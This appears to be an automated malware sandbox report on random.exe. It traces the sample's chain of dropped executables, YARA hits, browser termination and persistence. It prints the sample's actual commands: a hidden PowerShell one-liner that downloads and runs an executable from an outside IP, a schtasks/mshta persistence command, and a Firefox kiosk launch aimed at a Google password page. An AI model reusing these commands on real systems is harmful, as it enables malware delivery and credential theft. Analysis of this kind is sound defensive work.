Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Code function: 11_3_00CF15A6	11_3_00CF15A6

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF

Source: C:\Users\user\Desktop\random.exe	Code function: String function: 009DA570 appears 55 times
Source: C:\Users\user\Desktop\random.exe	Code function: String function: 009D3F50 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: String function: 00418F30 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: String function: 0040B190 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B53F50 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B62438 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B53040 appears 67 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B59D21 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B6844C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B5A570 appears 109 times
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: String function: 00B361F0 appears 39 times

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 796

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000F.00000002.2728858042.000000000E03A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000E.00000002.2623904415.000000000E332000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000E.00000002.2623904415.000000000E3C2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000F.00000002.2727875020.000000000DEDC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000F.00000002.2727875020.000000000DF32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000E.00000002.2623904415.000000000E2DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: Y-Cleaner.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe0.2.dr	Static PE information: Section: .css ZLIB complexity 1.0003294785334347
Source: 9f19f13091.exe.2.dr	Static PE information: Section: .css ZLIB complexity 1.0003294785334347
Source: random[1].exe1.2.dr	Static PE information: Section: ZLIB complexity 0.9996891422672672
Source: random[1].exe1.2.dr	Static PE information: Section: jiatgfgj ZLIB complexity 0.9944175562743045
Source: 1e8e57d62a.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9996891422672672
Source: 1e8e57d62a.exe.2.dr	Static PE information: Section: jiatgfgj ZLIB complexity 0.9944175562743045
Source: random[2].exe1.2.dr	Static PE information: Section: zapzckdv ZLIB complexity 0.9946498008345979
Source: 43a79b4335.exe.2.dr	Static PE information: Section: zapzckdv ZLIB complexity 0.9946498008345979
Source: random[3].exe.2.dr	Static PE information: Section: ajpgbetr ZLIB complexity 0.9945058770770393
Source: cefa09b2a4.exe.2.dr	Static PE information: Section: ajpgbetr ZLIB complexity 0.9945058770770393

Source: 186adf2617.exe.2.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe.2.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: dbe8776a6a.exe.2.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe0.2.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@83/81@55/16

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 2_2_00B3E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

2_2_00B3E8D0

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6508
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\bb556cff4a

Jump to behavior

Source: random.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5a20b6327b.exe, 0000000B.00000003.2354351719.000000000566A000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2372748599.0000000005654000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2354656959.000000000566A000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2354215407.000000000564C000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2354890648.000000000564B000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2372571779.000000000566A000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468861730.00000000054C7000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468291056.00000000054E6000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2484091990.00000000054D4000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468099760.00000000054C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe	Virustotal: Detection: 79%
Source: random.exe	ReversingLabs: Detection: 78%

Source: random.exe	String found in binary or memory: " /add
Source: random.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 796
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe "C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe "C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe "C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe "C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe"
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe"
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe"
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe "C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4234fd1-1ff5-4258-96b2-dd84d36c1391} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f7786dd10 socket
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process created: C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe "C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3584 -prefMapHandle 4240 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9aaf8ba-a9e7-435b-8569-42d4f3a4288a} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f08395210 rdd
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe"
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe "C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe "C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe "C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe "C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe "C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Process created: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Process created: C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe "C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe"
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4234fd1-1ff5-4258-96b2-dd84d36c1391} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f7786dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3584 -prefMapHandle 4240 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9aaf8ba-a9e7-435b-8569-42d4f3a4288a} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f08395210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mpr.dll	Jump to behavior
